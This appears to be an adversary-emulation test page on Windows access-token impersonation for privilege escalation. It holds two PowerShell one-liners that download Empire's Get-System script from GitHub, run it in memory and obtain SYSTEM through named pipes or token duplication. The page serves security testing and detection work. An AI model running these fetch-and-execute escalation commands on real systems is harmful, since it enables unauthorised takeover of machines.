Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token usingDuplicateToken(Ex). The token can then be used withImpersonateLoggedOnUserto allow the calling thread to impersonate a logged on user's security context, or withSetThreadTokento assign the impersonated token to a thread.An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
Uses PowerShell and Empire's GetSystem module. The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
Supported Platforms: Windows
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -VerboseUses PowerShell and Empire's GetSystem module. The script uses SeDebugPrivilege to obtain, duplicate and impersonate the token of a another process.
When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
Supported Platforms: Windows
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose